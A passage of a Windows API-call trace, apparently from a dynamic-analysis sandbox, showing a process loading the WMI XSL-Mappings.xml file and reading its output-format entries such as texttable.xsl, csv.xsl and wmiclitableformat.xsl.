(hKey=0x0) returned 0x6 [0282.869] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x89f5dc | out: ppv=0x89f5dc*=0x2ae45a8) returned 0x0 [0282.892] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x2ae45a8, xmlSource=0x89f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x89f5c8 | out: isSuccessful=0x89f5c8*=0xffff) returned 0x0 [0283.043] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2ae45a8, DOMElement=0x89f5d8 | out: DOMElement=0x89f5d8*=0x2ae6b48) returned 0x0 [0283.044] malloc (_Size=0xc) returned 0x2b398f8 [0283.044] IXMLDOMElement:getElementsByTagName (in: This=0x2ae6b48, tagName="XSLFORMAT", resultList=0x89f5d4 | out: resultList=0x89f5d4*=0x2ae9ca0) returned 0x0 [0283.046] free (_Block=0x2b398f8) [0283.046] IXMLDOMNodeList:get_length (in: This=0x2ae9ca0, listLength=0x89f5d0 | out: listLength=0x89f5d0*=21) returned 0x0 [0283.046] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=0, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.047] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.047] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.047] malloc (_Size=0xc) returned 0x2b39958 [0283.047] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.047] free (_Block=0x2b39958) [0283.047] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0283.047] malloc (_Size=0xc) returned 0x2b398f8 [0283.047] malloc (_Size=0xc) returned 0x2b39868 [0283.048] malloc (_Size=0x18) returned 0x2b32a60 [0283.048] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.048] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.048] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.048] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=1, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.048] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="textvaluelist.xsl") returned 0x0 [0283.048] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.048] malloc (_Size=0xc) returned 0x2b39808 [0283.048] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.049] free (_Block=0x2b39808) [0283.049] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0283.049] malloc (_Size=0xc) returned 0x2b39910 [0283.049] malloc (_Size=0xc) returned 0x2b39928 [0283.049] SysStringLen (param_1="VALUE") returned 0x5 [0283.049] SysStringLen (param_1="TABLE") returned 0x5 [0283.049] SysStringLen (param_1="TABLE") returned 0x5 [0283.049] SysStringLen (param_1="VALUE") returned 0x5 [0283.049] malloc (_Size=0x18) returned 0x2b329c0 [0283.049] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.049] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.049] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.049] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=2, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.049] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="textvaluelist.xsl") returned 0x0 [0283.050] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.050] malloc (_Size=0xc) returned 0x2b39808 [0283.050] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.050] free (_Block=0x2b39808) [0283.050] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0283.050] malloc (_Size=0xc) returned 0x2b39850 [0283.050] malloc (_Size=0xc) returned 0x2b398c8 [0283.050] SysStringLen (param_1="LIST") returned 0x4 [0283.050] SysStringLen (param_1="TABLE") returned 0x5 [0283.050] malloc (_Size=0x18) returned 0x2b32ae0 [0283.051] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.051] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.051] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.051] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=3, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.051] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="rawxml.xsl") returned 0x0 [0283.051] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.051] malloc (_Size=0xc) returned 0x2b397f0 [0283.051] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.051] free (_Block=0x2b397f0) [0283.051] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0283.052] malloc (_Size=0xc) returned 0x2b399a0 [0283.052] malloc (_Size=0xc) returned 0x2b39958 [0283.052] SysStringLen (param_1="RAWXML") returned 0x6 [0283.052] SysStringLen (param_1="TABLE") returned 0x5 [0283.052] SysStringLen (param_1="RAWXML") returned 0x6 [0283.052] SysStringLen (param_1="LIST") returned 0x4 [0283.052] SysStringLen (param_1="LIST") returned 0x4 [0283.052] SysStringLen (param_1="RAWXML") returned 0x6 [0283.052] malloc (_Size=0x18) returned 0x2b32a00 [0283.052] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.052] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.052] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.052] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=4, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.052] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="htable.xsl") returned 0x0 [0283.052] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.053] malloc (_Size=0xc) returned 0x2b39880 [0283.053] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.053] free (_Block=0x2b39880) [0283.053] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0283.053] malloc (_Size=0xc) returned 0x2b39820 [0283.053] malloc (_Size=0xc) returned 0x2b39988 [0283.053] SysStringLen (param_1="HTABLE") returned 0x6 [0283.053] SysStringLen (param_1="TABLE") returned 0x5 [0283.053] SysStringLen (param_1="HTABLE") returned 0x6 [0283.053] SysStringLen (param_1="LIST") returned 0x4 [0283.053] malloc (_Size=0x18) returned 0x2b32d60 [0283.054] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.054] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.054] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.054] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=5, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.054] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="hform.xsl") returned 0x0 [0283.054] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.054] malloc (_Size=0xc) returned 0x2b39880 [0283.054] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.054] free (_Block=0x2b39880) [0283.054] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0283.055] malloc (_Size=0xc) returned 0x2b39880 [0283.055] malloc (_Size=0xc) returned 0x2b39940 [0283.055] SysStringLen (param_1="HFORM") returned 0x5 [0283.055] SysStringLen (param_1="TABLE") returned 0x5 [0283.055] SysStringLen (param_1="HFORM") returned 0x5 [0283.055] SysStringLen (param_1="LIST") returned 0x4 [0283.055] SysStringLen (param_1="HFORM") returned 0x5 [0283.055] SysStringLen (param_1="HTABLE") returned 0x6 [0283.055] malloc (_Size=0x18) returned 0x2b32c20 [0283.055] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.055] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.055] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.055] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=6, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.055] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="xml.xsl") returned 0x0 [0283.055] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.056] malloc (_Size=0xc) returned 0x2b399b8 [0283.056] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.056] free (_Block=0x2b399b8) [0283.056] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0283.056] malloc (_Size=0xc) returned 0x2b39898 [0283.056] malloc (_Size=0xc) returned 0x2b398b0 [0283.056] SysStringLen (param_1="XML") returned 0x3 [0283.056] SysStringLen (param_1="TABLE") returned 0x5 [0283.056] SysStringLen (param_1="XML") returned 0x3 [0283.056] SysStringLen (param_1="VALUE") returned 0x5 [0283.056] SysStringLen (param_1="VALUE") returned 0x5 [0283.056] SysStringLen (param_1="XML") returned 0x3 [0283.056] malloc (_Size=0x18) returned 0x2b32b80 [0283.057] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.057] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.057] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.057] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=7, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.057] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="mof.xsl") returned 0x0 [0283.057] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.057] malloc (_Size=0xc) returned 0x2b39970 [0283.057] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.057] free (_Block=0x2b39970) [0283.058] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0283.058] malloc (_Size=0xc) returned 0x2b39970 [0283.058] malloc (_Size=0xc) returned 0x2b399b8 [0283.058] SysStringLen (param_1="MOF") returned 0x3 [0283.058] SysStringLen (param_1="TABLE") returned 0x5 [0283.058] SysStringLen (param_1="MOF") returned 0x3 [0283.058] SysStringLen (param_1="LIST") returned 0x4 [0283.058] SysStringLen (param_1="MOF") returned 0x3 [0283.058] SysStringLen (param_1="RAWXML") returned 0x6 [0283.058] SysStringLen (param_1="LIST") returned 0x4 [0283.058] SysStringLen (param_1="MOF") returned 0x3 [0283.058] malloc (_Size=0x18) returned 0x2b32ba0 [0283.058] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.058] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.058] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.058] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=8, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.058] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="csv.xsl") returned 0x0 [0283.058] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.059] malloc (_Size=0xc) returned 0x2b397f0 [0283.059] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.059] free (_Block=0x2b397f0) [0283.059] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0283.059] malloc (_Size=0xc) returned 0x2b39838 [0283.059] malloc (_Size=0xc) returned 0x2b397f0 [0283.059] SysStringLen (param_1="CSV") returned 0x3 [0283.059] SysStringLen (param_1="TABLE") returned 0x5 [0283.059] SysStringLen (param_1="CSV") returned 0x3 [0283.059] SysStringLen (param_1="LIST") returned 0x4 [0283.059] SysStringLen (param_1="CSV") returned 0x3 [0283.059] SysStringLen (param_1="HTABLE") returned 0x6 [0283.059] SysStringLen (param_1="CSV") returned 0x3 [0283.059] SysStringLen (param_1="HFORM") returned 0x5 [0283.059] malloc (_Size=0x18) returned 0x2b32bc0 [0283.060] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.060] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.060] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.060] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=9, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.060] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.060] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.060] malloc (_Size=0xc) returned 0x2b39808 [0283.060] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.060] free (_Block=0x2b39808) [0283.060] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0283.060] malloc (_Size=0xc) returned 0x2b39808 [0283.060] malloc (_Size=0xc) returned 0x2b3ac48 [0283.061] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.061] SysStringLen (param_1="TABLE") returned 0x5 [0283.061] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.061] SysStringLen (param_1="VALUE") returned 0x5 [0283.061] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.061] SysStringLen (param_1="XML") returned 0x3 [0283.061] SysStringLen (param_1="XML") returned 0x3 [0283.061] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.061] malloc (_Size=0x18) returned 0x2b329e0 [0283.061] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.061] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.061] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.061] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=10, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.061] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.061] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.061] malloc (_Size=0xc) returned 0x2b3ab28 [0283.061] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.062] free (_Block=0x2b3ab28) [0283.062] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0283.062] malloc (_Size=0xc) returned 0x2b3ac90 [0283.062] malloc (_Size=0xc) returned 0x2b3ac30 [0283.062] SysStringLen (param_1="texttablewsys") returned 0xd [0283.062] SysStringLen (param_1="TABLE") returned 0x5 [0283.062] SysStringLen (param_1="texttablewsys") returned 0xd [0283.062] SysStringLen (param_1="XML") returned 0x3 [0283.062] SysStringLen (param_1="texttablewsys") returned 0xd [0283.062] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.062] SysStringLen (param_1="XML") returned 0x3 [0283.062] SysStringLen (param_1="texttablewsys") returned 0xd [0283.062] malloc (_Size=0x18) returned 0x2b32b00 [0283.062] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.062] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.062] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.062] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=11, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.063] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.063] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.063] malloc (_Size=0xc) returned 0x2b3abe8 [0283.063] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.063] free (_Block=0x2b3abe8) [0283.063] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0283.063] malloc (_Size=0xc) returned 0x2b3adb0 [0283.063] malloc (_Size=0xc) returned 0x2b3ab70 [0283.063] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.063] SysStringLen (param_1="TABLE") returned 0x5 [0283.063] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.063] SysStringLen (param_1="XML") returned 0x3 [0283.063] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.064] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.064] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.064] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.064] malloc (_Size=0x18) returned 0x2b32a20 [0283.064] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.064] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.064] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.064] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=12, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.064] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.064] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.064] malloc (_Size=0xc) returned 0x2b3ad80 [0283.064] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.065] free (_Block=0x2b3ad80) [0283.065] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0283.065] malloc (_Size=0xc) returned 0x2b3aca8 [0283.065] malloc (_Size=0xc) returned 0x2b3ab28 [0283.065] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.065] SysStringLen (param_1="TABLE") returned 0x5 [0283.065] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.065] SysStringLen (param_1="XML") returned 0x3 [0283.065] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.065] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.065] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.065] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.065] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.065] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0283.065] malloc (_Size=0x18) returned 0x2b32a40 [0283.065] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.065] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.065] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.065] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=13, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.066] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.066] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.066] malloc (_Size=0xc) returned 0x2b3acc0 [0283.066] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.066] free (_Block=0x2b3acc0) [0283.066] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0283.066] malloc (_Size=0xc) returned 0x2b3ab58 [0283.066] malloc (_Size=0xc) returned 0x2b3ab88 [0283.066] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.066] SysStringLen (param_1="TABLE") returned 0x5 [0283.066] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.066] SysStringLen (param_1="XML") returned 0x3 [0283.066] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.066] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.066] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.066] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.067] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.067] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.067] malloc (_Size=0x18) returned 0x2b32c80 [0283.067] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.067] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.067] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.067] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=14, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.154] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="texttable.xsl") returned 0x0 [0283.154] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.154] malloc (_Size=0xc) returned 0x2b3ade0 [0283.154] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.154] free (_Block=0x2b3ade0) [0283.155] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0283.155] malloc (_Size=0xc) returned 0x2b3ad38 [0283.155] malloc (_Size=0xc) returned 0x2b3ac18 [0283.155] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0283.155] SysStringLen (param_1="TABLE") returned 0x5 [0283.155] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0283.155] SysStringLen (param_1="XML") returned 0x3 [0283.155] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0283.155] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0283.155] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0283.155] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.155] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0283.155] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0283.155] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0283.155] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0283.155] malloc (_Size=0x18) returned 0x2b32d20 [0283.155] IUnknown:Release (This=0x2ae6b88) returned 0x0 [0283.155] IUnknown:Release (This=0x2ae9fa8) returned 0x0 [0283.155] IUnknown:Release (This=0x2ae9ff8) returned 0x0 [0283.155] IXMLDOMNodeList:get_item (in: This=0x2ae9ca0, index=15, listItem=0x89f5f0 | out: listItem=0x89f5f0*=0x2ae6b88) returned 0x0 [0283.156] IXMLDOMNode:get_text (in: This=0x2ae6b88, text=0x89f5f4 | out: text=0x89f5f4*="htable.xsl") returned 0x0 [0283.156] IXMLDOMNode:get_attributes (in: This=0x2ae6b88, attributeMap=0x89f5ec | out: attributeMap=0x89f5ec*=0x2ae9fa8) returned 0x0 [0283.156] malloc (_Size=0xc) returned 0x2b3abd0 [0283.156] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ae9fa8, name="KEYWORD", namedItem=0x89f5e8 | out: namedItem=0x89f5e8*=0x2ae9ff8) returned 0x0 [0283.156] free (_Block=0x2b3abd0) [0283.156] IXMLDOMNode:get_nodeValue (in: This=0x2ae9ff8, value=0x89f5a8 | out: value=0x89f5a8*(varType=0x8, wReserved1=0x0, 